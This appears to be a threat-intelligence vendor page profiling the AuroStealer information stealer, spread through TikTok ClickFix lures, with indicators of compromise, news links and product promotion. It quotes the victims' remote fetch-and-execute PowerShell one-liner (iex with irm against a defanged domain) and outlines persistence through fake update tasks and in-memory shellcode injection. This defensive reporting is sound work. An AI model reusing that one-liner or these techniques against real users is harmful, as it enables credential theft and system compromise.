Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

AuroStealer

AuroStealer is an information-stealing Trojan delivered in a TikTok-driven ClickFix-style social engineering campaign. Victims are lured by TikTok videos advertising “free” software activation (e.g., Photoshop) and are instructed to run an elevated PowerShell one-liner (e.g., iex (irm slmgr[.]win/photoshop)). The served PowerShell (SHA-256: 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23) downloads an executable payload from https://file-epq[.]pages[.]dev/updater.exe (SHA-256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8), identified as AuroStealer, and establishes persistence via a scheduled task configured to run at user logon. The scheduled task name is chosen from a list mimicking legitimate update tasks (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, AdobeUpdateTask, OfficeBackgroundTaskHandlerRegistration, WindowsUpdateCheck) and runs powershell.exe with hidden window style and ExecutionPolicy Bypass.

The same chain also downloads and executes an additional payload source.exe (SHA-256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) which performs on-host compilation by invoking C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe using a cmdline file at C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline. The dynamically compiled code includes a class that allocates RWX memory and executes injected shellcode in-memory via VirtualAlloc, CreateThread, and WaitForSingleObject.

The campaign is reported to reuse the lure across multiple fake “free software” themes and is associated in reporting with ongoing TikTok-based ClickFix activity distributing stealers (including AuroStealer; other families mentioned in the same context include Vidar and StealC). No specific threat actor attribution is provided in the content.

Notable IOCs mentioned: slmgr[.]win/photoshop, file-epq[.]pages[.]dev/updater.exe, PowerShell SHA-256 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23, updater.exe (AuroStealer) SHA-256 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8, source.exe SHA-256 db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011, and the temp cmdline path C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
INDICATORS OF COMPROMISE

IOCs tracked for this family

4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
2 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app8 months ago
domain●●●●●●●●●●●●View more in app8 months ago
hash.sha256●●●●●●●●●●●●View more in app8 months ago
uri●●●●●●●●●●●●View more in app8 months ago
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
zdnet zero dayNews
Oct 22, 2025
If a TikTok 'tech tip' tells you to paste code, it's a scam. Here's what's really happening

AuroStealer is a Trojan designed to steal credentials and system information from infected systems. It is delivered via social engineering attacks, such as ClickFix campaigns on TikTok, where users are tricked into executing malicious PowerShell commands.

Read more
zdnet zero dayNews
Oct 21, 2025
TikTok video promising you free Photoshop or Windows license? Don't do it - it's a scam

AuroStealer is a Trojan designed to steal credentials and system information from infected devices. It is delivered via social engineering attacks, such as ClickFix campaigns on TikTok, where users are tricked into executing malicious PowerShell commands.

Read more
zdnet zero dayNews
Oct 21, 2025
This TikTok scam promises you a free Photoshop or Windows license - and then steals your info

AuroStealer is a Trojan designed to steal credentials and system information from infected devices. It is delivered via social engineering attacks, such as ClickFix campaigns on TikTok, where users are tricked into executing malicious PowerShell commands.

Read more
sans iscNews
Oct 17, 2025
TikTok Videos Promoting Malware Installation

AuroStealer is an information stealer malware that is delivered as a second-stage payload via malicious PowerShell scripts. It is designed to steal sensitive information from infected systems.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching4

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.